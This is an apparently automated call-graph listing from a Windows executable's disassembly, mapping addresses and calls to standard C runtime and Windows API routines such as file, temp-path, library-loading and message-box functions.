7ff614c8cfcc 15570->15618 15571->15568 15571->15570 15572 7ff614c8d964 15571->15572 15574 7ff614c8d927 15571->15574 15577 7ff614c8d91d 15571->15577 15611 7ff614c8d2ac 15572->15611 15601 7ff614c8d4dc 15574->15601 15575->15513 15575->15514 15577->15570 15579 7ff614c8d922 15577->15579 15579->15572 15579->15574 15580->15575 15592 7ff614c891dc 15580->15592 15583 7ff614c89e00 _wfindfirst32i64 17 API calls 15584 7ff614c8da2c 15583->15584 15586 7ff614c8cb47 15585->15586 15590 7ff614c8cb0b _set_fmode 15585->15590 15587 7ff614c84474 _set_fmode 11 API calls 15586->15587 15589 7ff614c7fe74 15587->15589 15588 7ff614c8cb2e RtlAllocateHeap 15588->15589 15588->15590 15589->15560 15589->15562 15590->15586 15590->15588 15591 7ff614c926e0 _set_fmode 2 API calls 15590->15591 15591->15590 15593 7ff614c891f3 15592->15593 15594 7ff614c891e9 15592->15594 15595 7ff614c84474 _set_fmode 11 API calls 15593->15595 15594->15593 15599 7ff614c8920e 15594->15599 15596 7ff614c891fa 15595->15596 15597 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15596->15597 15598 7ff614c89206 15597->15598 15598->15575 15598->15583 15599->15598 15600 7ff614c84474 _set_fmode 11 API calls 15599->15600 15600->15596 15634 7ff614c931fc 15601->15634 15605 7ff614c8d588 15605->15575 15606 7ff614c8d5d9 15687 7ff614c8d0c8 15606->15687 15607 7ff614c8d584 15607->15605 15607->15606 15609 7ff614c8d5a4 15607->15609 15683 7ff614c8d384 15609->15683 15612 7ff614c931fc 38 API calls 15611->15612 15613 7ff614c8d2f6 15612->15613 15614 7ff614c92c44 37 API calls 15613->15614 15615 7ff614c8d346 15614->15615 15616 7ff614c8d34a 15615->15616 15617 7ff614c8d384 45 API calls 15615->15617 15616->15575 15617->15616 15619 7ff614c931fc 38 API calls 15618->15619 15620 7ff614c8d017 15619->15620 15621 7ff614c92c44 37 API calls 15620->15621 15622 7ff614c8d06f 15621->15622 15623 7ff614c8d073 15622->15623 15624 7ff614c8d0c8 45 API calls 15622->15624 15623->15575 15624->15623 15626 7ff614c8cc79 15625->15626 15627 7ff614c8ccac 15625->15627 15628 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15626->15628 15629 7ff614c8ccc4 15627->15629 15631 7ff614c8cd45 15627->15631 15633 7ff614c8cca5 __scrt_get_show_window_mode 15628->15633 15630 7ff614c8cfcc 46 API calls 15629->15630 15630->15633 15632 7ff614c83a50 45 API calls 15631->15632 15631->15633 15632->15633 15633->15575 15635 7ff614c9324f fegetenv 15634->15635 15636 7ff614c9715c 37 API calls 15635->15636 15641 7ff614c932a2 15636->15641 15637 7ff614c932cf 15640 7ff614c891dc __std_exception_copy 37 API calls 15637->15640 15638 7ff614c93392 15639 7ff614c9715c 37 API calls 15638->15639 15642 7ff614c933bc 15639->15642 15643 7ff614c9334d 15640->15643 15641->15638 15644 7ff614c932bd 15641->15644 15645 7ff614c9336c 15641->15645 15646 7ff614c9715c 37 API calls 15642->15646 15647 7ff614c94474 15643->15647 15653 7ff614c93355 15643->15653 15644->15637 15644->15638 15648 7ff614c891dc __std_exception_copy 37 API calls 15645->15648 15649 7ff614c933cd 15646->15649 15651 7ff614c89e00 _wfindfirst32i64 17 API calls 15647->15651 15648->15643 15650 7ff614c97350 20 API calls 15649->15650 15660 7ff614c93436 __scrt_get_show_window_mode 15650->15660 15652 7ff614c94489 15651->15652 15654 7ff614c7adb0 _wfindfirst32i64 8 API calls 15653->15654 15655 7ff614c8d529 15654->15655 15679 7ff614c92c44 15655->15679 15656 7ff614c937df __scrt_get_show_window_mode 15657 7ff614c93b1f 15658 7ff614c92d60 37 API calls 15657->15658 15665 7ff614c94237 15658->15665 15659 7ff614c93acb 15659->15657 15662 7ff614c9448c memcpy_s 37 API calls 15659->15662 15660->15656 15661 7ff614c93477 memcpy_s 15660->15661 15663 7ff614c84474 _set_fmode 11 API calls 15660->15663 15675 7ff614c938d3 memcpy_s __scrt_get_show_window_mode 15661->15675 15678 7ff614c93dbb memcpy_s __scrt_get_show_window_mode 15661->15678 15662->15657 15664 7ff614c938b0 15663->15664 15666 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15664->15666 15668 7ff614c9448c memcpy_s 37 API calls 15665->15668 15672 7ff614c94292 15665->15672 15666->15661 15667 7ff614c94418 15670 7ff614c9715c 37 API calls 15667->15670 15668->15672 15669 7ff614c84474 11 API calls _set_fmode 15669->15678 15670->15653 15671 7ff614c84474 11 API calls _set_fmode 15671->15675 15672->15667 15673 7ff614c92d60 37 API calls 15672->15673 15677 7ff614c9448c memcpy_s 37 API calls 15672->15677 15673->15672 15674 7ff614c89de0 37 API calls _invalid_parameter_noinfo 15674->15678 15675->15659 15675->15671 15676 7ff614c89de0 37 API calls _invalid_parameter_noinfo 15675->15676 15676->15675 15677->15672 15678->15657 15678->15659 15678->15669 15678->15674 15680 7ff614c92c63 15679->15680 15681 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15680->15681 15682 7ff614c92c8e memcpy_s 15680->15682 15681->15682 15682->15607 15684 7ff614c8d3b0 memcpy_s 15683->15684 15685 7ff614c83a50 45 API calls 15684->15685 15686 7ff614c8d46a memcpy_s __scrt_get_show_window_mode 15684->15686 15685->15686 15686->15605 15688 7ff614c8d103 15687->15688 15691 7ff614c8d150 memcpy_s 15687->15691 15689 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15688->15689 15690 7ff614c8d12f 15689->15690 15690->15605 15693 7ff614c8d1bb 15691->15693 15694 7ff614c83a50 45 API calls 15691->15694 15692 7ff614c891dc __std_exception_copy 37 API calls 15697 7ff614c8d1fd memcpy_s 15692->15697 15693->15692 15694->15693 15695 7ff614c89e00 _wfindfirst32i64 17 API calls 15696 7ff614c8d2a8 15695->15696 15697->15695 15699 7ff614c8f10c WideCharToMultiByte 15698->15699 15702 7ff614c7ffe3 15701->15702 15703 7ff614c7ffd1 15701->15703 15705 7ff614c7fff0 15702->15705 15709 7ff614c8002d 15702->15709 15704 7ff614c84474 _set_fmode 11 API calls 15703->15704 15706 7ff614c7ffd6 15704->15706 15707 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15705->15707 15708 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15706->15708 15713 7ff614c7ffe1 15707->15713 15708->15713 15710 7ff614c800d6 15709->15710 15711 7ff614c84474 _set_fmode 11 API calls 15709->15711 15712 7ff614c84474 _set_fmode 11 API calls 15710->15712 15710->15713 15714 7ff614c800cb 15711->15714 15715 7ff614c80180 15712->15715 15713->15439 15716 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15714->15716 15717 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15715->15717 15716->15710 15717->15713 15719 7ff614c83a8f 15718->15719 15720 7ff614c8cba9 15718->15720 15722 7ff614c8cbfc 15719->15722 15720->15719 15726 7ff614c92454 15720->15726 15723 7ff614c8cc15 15722->15723 15724 7ff614c83a9f 15722->15724 15723->15724 15770 7ff614c917c0 15723->15770 15724->15439 15738 7ff614c8a650 GetLastError 15726->15738 15729 7ff614c924ae 15729->15719 15739 7ff614c8a691 FlsSetValue 15738->15739 15740 7ff614c8a674 FlsGetValue 15738->15740 15742 7ff614c8a6a3 15739->15742 15757 7ff614c8a681 15739->15757 15741 7ff614c8a68b 15740->15741 15740->15757 15741->15739 15744 7ff614c8dd70 _set_fmode 11 API calls 15742->15744 15743 7ff614c8a6fd SetLastError 15745 7ff614c8a70a 15743->15745 15746 7ff614c8a71d 15743->15746 15747 7ff614c8a6b2 15744->15747 15745->15729 15760 7ff614c8f7b8 EnterCriticalSection 15745->15760 15761 7ff614c8923c 15746->15761 15749 7ff614c8a6d0 FlsSetValue 15747->15749 15750 7ff614c8a6c0 FlsSetValue 15747->15750 15752 7ff614c8a6ee 15749->15752 15753 7ff614c8a6dc FlsSetValue 15749->15753 15751 7ff614c8a6c9 15750->15751 15755 7ff614c89e48 __free_lconv_mon 11 API calls 15751->15755 15756 7ff614c8a3f4 _set_fmode 11 API calls 15752->15756 15753->15751 15755->15757 15758 7ff614c8a6f6 15756->15758 15757->15743 15759 7ff614c89e48 __free_lconv_mon 11 API calls 15758->15759 15759->15743 15762 7ff614c927a0 __FrameHandler3::FrameUnwindToEmptyState EnterCriticalSection LeaveCriticalSection 15761->15762 15764 7ff614c89245 15762->15764 15763 7ff614c89254 15766 7ff614c89287 __FrameHandler3::FrameUnwindToEmptyState 15763->15766 15767 7ff614c8925d IsProcessorFeaturePresent 15763->15767 15764->15763 15765 7ff614c927f0 __FrameHandler3::FrameUnwindToEmptyState 44 API calls 15764->15765 15765->15763 15768 7ff614c8926c 15767->15768 15769 7ff614c89b14 _wfindfirst32i64 14 API calls 15768->15769 15769->15766 15771 7ff614c8a650 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 15770->15771 15772 7ff614c917c9 15771->15772 15780 7ff614c8431c EnterCriticalSection 15773->15780 15782 7ff614c724ec 15781->15782 15783 7ff614c83c14 49 API calls 15782->15783 15784 7ff614c7253d 15783->15784 15785 7ff614c84474 _set_fmode 11 API calls 15784->15785 15786 7ff614c72542 15785->15786 15800 7ff614c84494 15786->15800 15789 7ff614c71b30 49 API calls 15790 7ff614c72571 __scrt_get_show_window_mode 15789->15790 15791 7ff614c77a60 57 API calls 15790->15791 15792 7ff614c725a6 15791->15792 15793 7ff614c725ab 15792->15793 15794 7ff614c725e3 MessageBoxA 15792->15794 15796 7ff614c77a60 57 API calls 15793->15796 15795 7ff614c725fd 15794->15795 15798 7ff614c7adb0 _wfindfirst32i64 8 API calls 15795->15798 15797 7ff614c725c5 MessageBoxW 15796->15797 15797->15795 15799 7ff614c7260d 15798->15799 15799->15120 15801 7ff614c8a7c8 _set_fmode 11 API calls 15800->15801 15802 7ff614c844ab 15801->15802 15803 7ff614c8dd70 _set_fmode 11 API calls 15802->15803 15805 7ff614c844eb 15802->15805 15809 7ff614c72549 15802->15809 15804 7ff614c844e0 15803->15804 15806 7ff614c89e48 __free_lconv_mon 11 API calls 15804->15806 15805->15809 15812 7ff614c8e448 15805->15812 15806->15805 15809->15789 15810 7ff614c89e00 _wfindfirst32i64 17 API calls 15811 7ff614c84530 15810->15811 15815 7ff614c8e465 15812->15815 15813 7ff614c8e46a 15814 7ff614c84474 _set_fmode 11 API calls 15813->15814 15817 7ff614c84511 15813->15817 15820 7ff614c8e474 15814->15820 15815->15813 15815->15817 15818 7ff614c8e4b4 15815->15818 15816 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15816->15817 15817->15809 15817->15810 15818->15817 15819 7ff614c84474 _set_fmode 11 API calls 15818->15819 15819->15820 15820->15816 15822 7ff614c77b94 WideCharToMultiByte 15821->15822 15823 7ff614c77c02 WideCharToMultiByte 15821->15823 15826 7ff614c77bd5 15822->15826 15827 7ff614c77bbe 15822->15827 15824 7ff614c73c25 15823->15824 15825 7ff614c77c2f 15823->15825 15824->15129 15824->15131 15828 7ff614c72620 57 API calls 15825->15828 15826->15823 15830 7ff614c77beb 15826->15830 15829 7ff614c72620 57 API calls 15827->15829 15828->15824 15829->15824 15831 7ff614c72620 57 API calls 15830->15831 15831->15824 15833 7ff614c89153 15832->15833 15836 7ff614c76a2e 15832->15836 15834 7ff614c891dc __std_exception_copy 37 API calls 15833->15834 15833->15836 15835 7ff614c89180 15834->15835 15835->15836 15837 7ff614c89e00 _wfindfirst32i64 17 API calls 15835->15837 15836->15150 15838 7ff614c891b0 15837->15838 15840 7ff614c717d4 15839->15840 15841 7ff614c717e4 15839->15841 15842 7ff614c73cd0 116 API calls 15840->15842 15843 7ff614c77230 83 API calls 15841->15843 15872 7ff614c71842 15841->15872 15842->15841 15844 7ff614c71815 15843->15844 15844->15872 15873 7ff614c7f964 15844->15873 15846 7ff614c7adb0 _wfindfirst32i64 8 API calls 15848 7ff614c719c0 15846->15848 15847 7ff614c7182b 15849 7ff614c7184c 15847->15849 15850 7ff614c7182f 15847->15850 15848->15165 15848->15166 15877 7ff614c7f62c 15849->15877 15851 7ff614c724d0 59 API calls 15850->15851 15851->15872 15854 7ff614c71867 15856 7ff614c724d0 59 API calls 15854->15856 15855 7ff614c7f964 73 API calls 15857 7ff614c718d1 15855->15857 15856->15872 15858 7ff614c718e3 15857->15858 15859 7ff614c718fe 15857->15859 15860 7ff614c724d0 59 API calls 15858->15860 15861 7ff614c7f62c _fread_nolock 53 API calls 15859->15861 15860->15872 15862 7ff614c71913 15861->15862 15862->15854 15863 7ff614c71925 15862->15863 15880 7ff614c7f3a0 15863->15880 15866 7ff614c7193d 15867 7ff614c72770 59 API calls 15866->15867 15867->15872 15868 7ff614c71993 15870 7ff614c7f2dc 74 API calls 15868->15870 15868->15872 15869 7ff614c71950 15869->15868 15871 7ff614c72770 59 API calls 15869->15871 15870->15872 15871->15868 15872->15846 15874 7ff614c7f994 15873->15874 15886 7ff614c7f6f4 15874->15886 15876 7ff614c7f9ad 15876->15847 15898 7ff614c7f64c 15877->15898 15881 7ff614c7f3a9 15880->15881 15883 7ff614c71939 15880->15883 15882 7ff614c84474 _set_fmode 11 API calls 15881->15882 15884 7ff614c7f3ae 15882->15884 15883->15866 15883->15869 15885 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15884->15885 15885->15883 15887 7ff614c7f75e 15886->15887 15888 7ff614c7f71e 15886->15888 15887->15888 15889 7ff614c7f76a 15887->15889 15890 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 15888->15890 15897 7ff614c8431c EnterCriticalSection 15889->15897 15891 7ff614c7f745 15890->15891 15891->15876 15899 7ff614c7f676 15898->15899 15900 7ff614c71861 15898->15900 15899->15900 15901 7ff614c7f685 __scrt_get_show_window_mode 15899->15901 15902 7ff614c7f6c2 15899->15902 15900->15854 15900->15855 15904 7ff614c84474 _set_fmode 11 API calls 15901->15904 15911 7ff614c8431c EnterCriticalSection 15902->15911 15906 7ff614c7f69a 15904->15906 15908 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 15906->15908 15908->15900 16005 7ff614c76740 15912->16005 15914 7ff614c71454 15915 7ff614c71459 15914->15915 16014 7ff614c76a60 15914->16014 15915->15178 15918 7ff614c714a7 15920 7ff614c714e0 15918->15920 15922 7ff614c73cd0 116 API calls 15918->15922 15919 7ff614c71487 15921 7ff614c724d0 59 API calls 15919->15921 15923 7ff614c7f964 73 API calls 15920->15923 15924 7ff614c7149d 15921->15924 15925 7ff614c714bf 15922->15925 15926 7ff614c714f2 15923->15926 15924->15178 15925->15920 15927 7ff614c714c7 15925->15927 15928 7ff614c71516 15926->15928 15929 7ff614c714f6 15926->15929 15930 7ff614c72770 59 API calls 15927->15930 15932 7ff614c7151c 15928->15932 15933 7ff614c71534 15928->15933 15931 7ff614c724d0 59 API calls 15929->15931 15945 7ff614c714d6 __std_exception_destroy 15930->15945 15931->15945 16039 7ff614c71050 15932->16039 15935 7ff614c71556 15933->15935 15936 7ff614c71575 15933->15936 15938 7ff614c724d0 59 API calls 15935->15938 15941 7ff614c7f62c _fread_nolock 53 API calls 15936->15941 15942 7ff614c715d5 15936->15942 15936->15945 16057 7ff614c7fd6c 15936->16057 15937 7ff614c71624 15940 7ff614c7f2dc 74 API calls 15937->15940 15938->15945 15939 7ff614c7f2dc 74 API calls 15939->15937 15940->15924 15941->15936 15944 7ff614c724d0 59 API calls 15942->15944 15944->15945 15945->15937 15945->15939 15947 7ff614c729c6 15946->15947 15948 7ff614c71b30 49 API calls 15947->15948 15950 7ff614c729fb 15948->15950 15949 7ff614c72e01 15950->15949 15951 7ff614c73b40 49 API calls 15950->15951 15952 7ff614c72a6f 15951->15952 16635 7ff614c72e20 15952->16635 15955 7ff614c72aea 15958 7ff614c72e20 75 API calls 15955->15958 15956 7ff614c72ab1 15957 7ff614c76740 98 API calls 15956->15957 15959 7ff614c72ab9 15957->15959 15960 7ff614c72b3c 15958->15960 15961 7ff614c72ada 15959->15961 16643 7ff614c76620 15959->16643 15962 7ff614c72ba6 15960->15962 15963 7ff614c72b40 15960->15963 15964 7ff614c72770 59 API calls 15961->15964 15968 7ff614c72ae3 15961->15968 15966 7ff614c72e20 75 API calls 15962->15966 15967 7ff614c76740 98 API calls 15963->15967 15964->15968 15969 7ff614c72bd2 15966->15969 15970 7ff614c72b48 15967->15970 15973 7ff614c7adb0 _wfindfirst32i64 8 API calls 15968->15973 15974 7ff614c72e20 75 API calls 15969->15974 15979 7ff614c72c32 15969->15979 15970->15961 15971 7ff614c76620 138 API calls 15970->15971 15976 7ff614c72b9b 15973->15976 15976->15178 15979->15949 16002 7ff614c717a1 16001->16002 16003 7ff614c71795 16001->16003 16002->15178 16004 7ff614c72770 59 API calls 16003->16004 16004->16002 16006 7ff614c76788 16005->16006 16007 7ff614c76752 16005->16007 16006->15914 16061 7ff614c716d0 16007->16061 16015 7ff614c76a70 16014->16015 16016 7ff614c71b30 49 API calls 16015->16016 16017 7ff614c76aa1 16016->16017 16018 7ff614c71b30 49 API calls 16017->16018 16029 7ff614c76c70 16017->16029 16021 7ff614c76ac8 16018->16021 16019 7ff614c7adb0 _wfindfirst32i64 8 API calls 16020 7ff614c7147f 16019->16020 16020->15918 16020->15919 16021->16029 16585 7ff614c85118 16021->16585 16023 7ff614c76bd9 16024 7ff614c77a60 57 API calls 16023->16024 16026 7ff614c76bf1 16024->16026 16025 7ff614c76cab 16026->16025 16028 7ff614c769b0 61 API calls 16026->16028 16033 7ff614c76c22 __std_exception_destroy 16026->16033 16028->16033 16029->16019 16035 7ff614c85118 49 API calls 16037 7ff614c76afd 16035->16037 16036 7ff614c77a60 57 API calls 16036->16037 16037->16023 16037->16029 16037->16035 16037->16036 16038 7ff614c778d0 58 API calls 16037->16038 16038->16037 16040 7ff614c710a6 16039->16040 16041 7ff614c710ad 16040->16041 16042 7ff614c710d3 16040->16042 16043 7ff614c72770 59 API calls 16041->16043 16045 7ff614c710ed 16042->16045 16046 7ff614c71109 16042->16046 16058 7ff614c7fd9c 16057->16058 16620 7ff614c7fabc 16058->16620 16063 7ff614c716f5 16061->16063 16062 7ff614c71738 16065 7ff614c767a0 16062->16065 16063->16062 16064 7ff614c72770 59 API calls 16063->16064 16064->16062 16066 7ff614c767b6 16065->16066 16067 7ff614c7682d GetTempPathW 16066->16067 16068 7ff614c767da 16066->16068 16069 7ff614c76842 16067->16069 16070 7ff614c769b0 61 API calls 16068->16070 16104 7ff614c72470 16069->16104 16071 7ff614c767e6 16070->16071 16128 7ff614c764a0 16071->16128 16081 7ff614c7685b __std_exception_destroy 16099 7ff614c768ca __std_exception_destroy 16105 7ff614c72495 16104->16105 16162 7ff614c83e68 16105->16162 16129 7ff614c764ac 16128->16129 16130 7ff614c77a60 57 API calls 16129->16130 16131 7ff614c764ce 16130->16131 16132 7ff614c764e9 ExpandEnvironmentStringsW 16131->16132 16133 7ff614c764d6 16131->16133 16135 7ff614c7650f __std_exception_destroy 16132->16135 16134 7ff614c72770 59 API calls 16133->16134 16141 7ff614c764e2 16134->16141 16136 7ff614c76526 16135->16136 16137 7ff614c76513 16135->16137 16142 7ff614c76534 16136->16142 16143 7ff614c76540 16136->16143 16139 7ff614c72770 59 API calls 16137->16139 16138 7ff614c7adb0 _wfindfirst32i64 8 API calls 16140 7ff614c76608 16138->16140 16139->16141 16140->16099 16152 7ff614c866e4 16140->16152 16141->16138 16469 7ff614c85f74 16142->16469 16476 7ff614c85378 16143->16476 16166 7ff614c83ec2 16162->16166 16163 7ff614c83ee7 16164 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 16163->16164 16179 7ff614c83f11 16164->16179 16165 7ff614c83f23 16180 7ff614c82220 16165->16180 16166->16163 16166->16165 16168 7ff614c84004 16169 7ff614c89e48 __free_lconv_mon 11 API calls 16168->16169 16169->16179 16170 7ff614c7adb0 _wfindfirst32i64 8 API calls 16171 7ff614c724b4 16170->16171 16171->16081 16173 7ff614c8402a 16173->16168 16177 7ff614c84034 16173->16177 16174 7ff614c83fd9 16175 7ff614c89e48 __free_lconv_mon 11 API calls 16174->16175 16175->16179 16176 7ff614c83fd0 16176->16168 16176->16174 16179->16170 16181 7ff614c8225e 16180->16181 16182 7ff614c8224e 16180->16182 16183 7ff614c82267 16181->16183 16188 7ff614c82295 16181->16188 16184 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 16182->16184 16185 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 16183->16185 16186 7ff614c8228d 16184->16186 16185->16186 16186->16168 16186->16173 16186->16174 16186->16176 16188->16182 16188->16186 16191 7ff614c82c34 16188->16191 16224 7ff614c82680 16188->16224 16261 7ff614c81e10 16188->16261 16192 7ff614c82ce7 16191->16192 16193 7ff614c82c76 16191->16193 16194 7ff614c82cec 16192->16194 16195 7ff614c82d40 16192->16195 16196 7ff614c82c7c 16193->16196 16197 7ff614c82d11 16193->16197 16225 7ff614c826a4 16224->16225 16226 7ff614c8268e 16224->16226 16317 7ff614c80258 16261->16317 16318 7ff614c8028d 16317->16318 16319 7ff614c8029f 16317->16319 16586 7ff614c8a650 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16585->16586 16587 7ff614c8512d 16586->16587 16588 7ff614c8eec7 16587->16588 16593 7ff614c8ede6 16587->16593 16607 7ff614c7af44 16588->16607 16591 7ff614c7adb0 _wfindfirst32i64 8 API calls 16592 7ff614c8eebf 16591->16592 16592->16037 16593->16591 16610 7ff614c7af58 IsProcessorFeaturePresent 16607->16610 16611 7ff614c7af6f 16610->16611 16616 7ff614c7aff4 RtlCaptureContext RtlLookupFunctionEntry 16611->16616 16617 7ff614c7af83 16616->16617 16618 7ff614c7b024 RtlVirtualUnwind 16616->16618 16619 7ff614c7ae30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16617->16619 16618->16617 16636 7ff614c72e54 16635->16636 16637 7ff614c83c14 49 API calls 16636->16637 16638 7ff614c72e7a 16637->16638 16639 7ff614c72e8b 16638->16639 16667 7ff614c84e38 16638->16667 16641 7ff614c7adb0 _wfindfirst32i64 8 API calls 16639->16641 16642 7ff614c72aad 16641->16642 16642->15955 16642->15956 16644 7ff614c7662e 16643->16644 16645 7ff614c73cd0 116 API calls 16644->16645 16646 7ff614c76655 16645->16646 16647 7ff614c76a60 136 API calls 16646->16647 16668 7ff614c84e55 16667->16668 16669 7ff614c84e61 16667->16669 16684 7ff614c846b0 16668->16684 16709 7ff614c84a4c 16669->16709 16675 7ff614c84e99 16720 7ff614c84534 16675->16720 16677 7ff614c84f09 16680 7ff614c846b0 69 API calls 16677->16680 16678 7ff614c84ef5 16679 7ff614c84e5a 16678->16679 16681 7ff614c89e48 __free_lconv_mon 11 API calls 16678->16681 16679->16639 16682 7ff614c84f15 16680->16682 16681->16679 16682->16679 16685 7ff614c846ca 16684->16685 16686 7ff614c846e7 16684->16686 16687 7ff614c84454 _fread_nolock 11 API calls 16685->16687 16686->16685 16688 7ff614c846fa CreateFileW 16686->16688 16689 7ff614c846cf 16687->16689 16690 7ff614c84764 16688->16690 16691 7ff614c8472e 16688->16691 16693 7ff614c84474 _set_fmode 11 API calls 16689->16693 16768 7ff614c84d28 16690->16768 16742 7ff614c84804 GetFileType 16691->16742 16696 7ff614c846d7 16693->16696 16700 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 16696->16700 16705 7ff614c846e2 16700->16705 16705->16679 16710 7ff614c84a6b 16709->16710 16711 7ff614c84a70 16709->16711 16710->16675 16717 7ff614c8dffc 16710->16717 16711->16710 16712 7ff614c8a650 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16711->16712 16713 7ff614c84a8b 16712->16713 16830 7ff614c8cb5c 16713->16830 16838 7ff614c8dde8 16717->16838 16721 7ff614c84582 16720->16721 16722 7ff614c8455e 16720->16722 16723 7ff614c845dc 16721->16723 16724 7ff614c84587 16721->16724 16726 7ff614c89e48 __free_lconv_mon 11 API calls 16722->16726 16731 7ff614c8456d 16722->16731 16848 7ff614c8e820 16723->16848 16727 7ff614c8459c 16724->16727 16728 7ff614c89e48 __free_lconv_mon 11 API calls 16724->16728 16724->16731 16726->16731 16729 7ff614c8cafc _fread_nolock 12 API calls 16727->16729 16728->16727 16729->16731 16731->16677 16731->16678 16743 7ff614c84852 16742->16743 16744 7ff614c8490f 16742->16744 16745 7ff614c8487e GetFileInformationByHandle 16743->16745 16749 7ff614c84c24 21 API calls 16743->16749 16746 7ff614c84939 16744->16746 16747 7ff614c84917 16744->16747 16750 7ff614c8492a GetLastError 16745->16750 16751 7ff614c848a7 16745->16751 16748 7ff614c8495c PeekNamedPipe 16746->16748 16766 7ff614c848fa 16746->16766 16747->16750 16752 7ff614c8491b 16747->16752 16748->16766 16757 7ff614c8486c 16749->16757 16757->16745 16757->16766 16769 7ff614c84d5e 16768->16769 16770 7ff614c84df6 __std_exception_destroy 16769->16770 16771 7ff614c84474 _set_fmode 11 API calls 16769->16771 16772 7ff614c7adb0 _wfindfirst32i64 8 API calls 16770->16772 16773 7ff614c84d70 16771->16773 16774 7ff614c84769 16772->16774 16775 7ff614c84474 _set_fmode 11 API calls 16773->16775 16831 7ff614c8cb71 16830->16831 16832 7ff614c84aae 16830->16832 16831->16832 16833 7ff614c92454 45 API calls 16831->16833 16834 7ff614c8cbc8 16832->16834 16833->16832 16835 7ff614c8cbf0 16834->16835 16836 7ff614c8cbdd 16834->16836 16835->16710 16836->16835 16837 7ff614c917c0 45 API calls 16836->16837 16837->16835 16839 7ff614c8de45 16838->16839 16841 7ff614c8de40 __vcrt_FlsAlloc 16838->16841 16839->16675 16840 7ff614c8de75 LoadLibraryW 16843 7ff614c8df4a 16840->16843 16844 7ff614c8de9a GetLastError 16840->16844 16841->16839 16841->16840 16842 7ff614c8df6a GetProcAddress 16841->16842 16847 7ff614c8ded4 LoadLibraryExW 16841->16847 16842->16839 16846 7ff614c8df7b 16842->16846 16843->16842 16845 7ff614c8df61 FreeLibrary 16843->16845 16844->16841 16845->16842 16846->16839 16847->16841 16847->16843 16850 7ff614c8e829 MultiByteToWideChar 16848->16850 16878 7ff614c891bd 16877->16878 16880 7ff614c770aa 16877->16880 16934 7ff614c8542c 16933->16934 16935 7ff614c85452 16934->16935 16938 7ff614c85485 16934->16938 16936 7ff614c84474 _set_fmode 11 API calls 16935->16936 16937 7ff614c85457 16936->16937 16939 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 16937->16939 16940 7ff614c8548b 16938->16940 16941 7ff614c85498 16938->16941 16942 7ff614c73d29 16939->16942 16943 7ff614c84474 _set_fmode 11 API calls 16940->16943 16952 7ff614c8a128 16941->16952 16942->15256 16943->16942 16965 7ff614c8f7b8 EnterCriticalSection 16952->16965 17313 7ff614c87998 17312->17313 17316 7ff614c87474 17313->17316 17315 7ff614c879b1 17315->15264 17317 7ff614c8748f 17316->17317 17318 7ff614c874be 17316->17318 17320 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 17317->17320 17326 7ff614c8431c EnterCriticalSection 17318->17326 17325 7ff614c874af 17320->17325 17325->17315 17328 7ff614c7f0d3 17327->17328 17329 7ff614c7f101 17327->17329 17330 7ff614c89d14 _invalid_parameter_noinfo 37 API calls 17328->17330 17331 7ff614c7f0f3 17329->17331 17337 7ff614c8431c EnterCriticalSection 17329->17337 17330->17331 17331->15270 17339 7ff614c712f8 17338->17339 17340 7ff614c712c6 17338->17340 17342 7ff614c7f964 73 API calls 17339->17342 17341 7ff614c73cd0 116 API calls 17340->17341 17343 7ff614c712d6 17341->17343 17344 7ff614c7130a 17342->17344 17343->17339 17347 7ff614c712de 17343->17347 17345 7ff614c7130e 17344->17345 17346 7ff614c7132f 17344->17346 17348 7ff614c724d0 59 API calls 17345->17348 17352 7ff614c71364 17346->17352 17353 7ff614c71344 17346->17353 17349 7ff614c72770 59 API calls 17347->17349 17350 7ff614c71325 17348->17350 17351 7ff614c712ee 17349->17351 17350->15294 17351->15294 17355 7ff614c7137e 17352->17355 17359 7ff614c71395 17352->17359 17354 7ff614c724d0 59 API calls 17353->17354 17362 7ff614c7135f __std_exception_destroy 17354->17362 17356 7ff614c71050 98 API calls 17355->17356 17356->17362 17357 7ff614c7f62c _fread_nolock 53 API calls 17357->17359 17358 7ff614c71421 17358->15294 17359->17357 17361 7ff614c713de 17359->17361 17359->17362 17360 7ff614c7f2dc 74 API calls 17360->17358 17363 7ff614c724d0 59 API calls 17361->17363 17362->17358 17362->17360 17363->17362 17365 7ff614c71b30 49 API calls 17364->17365 17366 7ff614c73d80 17365->17366 17366->15296 17368 7ff614c716ab 17367->17368 17369 7ff614c71669 17367->17369 17368->15313 17369->17368 17370 7ff614c72770 59 API calls 17369->17370 17371 7ff614c716bf 17370->17371 17371->15313 17373 7ff614c77a60 57 API calls 17372->17373 17374 7ff614c771f7 LoadLibraryExW 17373->17374 17375 7ff614c77214 __std_exception_destroy 17374->17375 17375->15321 17377 7ff614c75fbc GetProcAddress 17376->17377 17382 7ff614c75f99 17376->17382 17378 7ff614c75fe1 GetProcAddress 17377->17378 17377->17382 17379 7ff614c76006 GetProcAddress 17378->17379 17378->17382 17379->17382 17380 7ff614c72620 57 API calls 17381 7ff614c75fac 17380->17381 17381->15328 17382->17380 17436 7ff614c74990 17435->17436 17437 7ff614c71b30 49 API calls 17436->17437 17438 7ff614c749c2 17437->17438 17439 7ff614c749eb 17438->17439 17440 7ff614c749cb 17438->17440 17442 7ff614c74a42 17439->17442 17444 7ff614c73d50 49 API calls 17439->17444 17441 7ff614c72770 59 API calls 17440->17441 17462 7ff614c749e1 17441->17462 17443 7ff614c73d50 49 API calls 17442->17443 17445 7ff614c74a5b 17443->17445 17446 7ff614c74a0c 17444->17446 17447 7ff614c74a79 17445->17447 